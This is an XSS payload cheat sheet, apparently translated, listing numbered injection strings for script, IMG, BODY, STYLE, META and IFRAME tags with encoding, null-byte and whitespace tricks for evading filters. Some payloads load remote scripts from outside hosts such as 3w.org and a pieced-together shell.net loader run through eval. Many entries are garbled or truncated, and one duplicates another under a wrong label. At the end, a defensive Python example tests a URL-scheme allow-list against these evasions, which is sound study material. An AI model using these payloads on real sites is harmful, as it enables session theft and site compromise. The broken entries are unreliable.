(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative ways to pop an alert
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed (broken) IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around a character limit (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC=\'#\'" /span>

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META refresh URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (an open angle bracket followed by a name starting with a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
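Most of the IMG/BODY/LINK/META cases above put a "javascript:" URL into an attribute and hide the scheme from a filter with case changes (4), character references with or without semicolons (5, 8-10), embedded tab/LF/CR (11-14), NUL bytes (17-18) or leading control characters (19). As an added defensive example, not part of the original list, the Python below canonicalizes an attribute value the way a browser does before reading the scheme and then applies an allow-list; the sample values are constructed to mirror those cases, and ALLOWED_SCHEMES is an assumed policy.

```python
import html
import re
from urllib.parse import urlsplit

# Assumed policy: schemes a URL-valued attribute (SRC, HREF, BACKGROUND, ...)
# may carry. Scheme-less (relative) URLs are accepted too; anything else is rejected.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

def canonicalize_url(value: str) -> str:
    """Undo the transformations the browser applies before it reads the scheme."""
    # Cases 5 and 8-10: decode character references, with or without a ';'.
    s = html.unescape(value)
    # Cases 17-18: drop NUL bytes that old parsers simply skipped over.
    s = s.replace("\x00", "")
    # Cases 11-14: the URL parser ignores tab, LF and CR anywhere in the value.
    s = re.sub(r"[\t\n\r]", "", s)
    # Case 19: strip leading/trailing C0 control characters and spaces.
    return re.sub(r"^[\x00-\x20]+|[\x00-\x20]+$", "", s)

def naive_allows(value: str) -> bool:
    """Deny-list substring filter: the weak check the cheat sheet defeats."""
    return "javascript:" not in value.lower()

def scheme_allows(value: str) -> bool:
    """Allow-list check on the canonical scheme (urlsplit lowercases it, case 4)."""
    scheme = urlsplit(canonicalize_url(value)).scheme
    return scheme == "" or scheme in ALLOWED_SCHEMES

# Constructed attribute values mirroring the cheat sheet's evasion cases.
EVASIONS = {
    "4 mixed case": "JaVaScRiPt:alert('XSS')",
    "5 decimal refs": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "10 hex refs, no ';'": "&#x6A&#x61vascript:alert('XSS')",
    "11 embedded tab": "jav\tascript:alert('XSS')",
    "13 embedded LF": "jav\nascript:alert('XSS')",
    "17 NUL byte": "java\x00script:alert('XSS')",
    "19 leading control": "\x0e javascript:alert('XSS')",
}
BENIGN = ["https://example.com/a.png", "/images/logo.png"]

def evaluate() -> dict:
    """Per evasion case: (naive filter lets it through?, allow-list lets it through?)."""
    return {name: (naive_allows(v), scheme_allows(v)) for name, v in EVASIONS.items()}

if __name__ == "__main__":
    for name, (naive, strict) in evaluate().items():
        print(f"{name:20} naive={'pass' if naive else 'block'}  allow-list={'pass' if strict else 'block'}")
```

The naive filter blocks only the mixed-case variant, while the canonicalizing allow-list blocks every case and still accepts the two benign URLs.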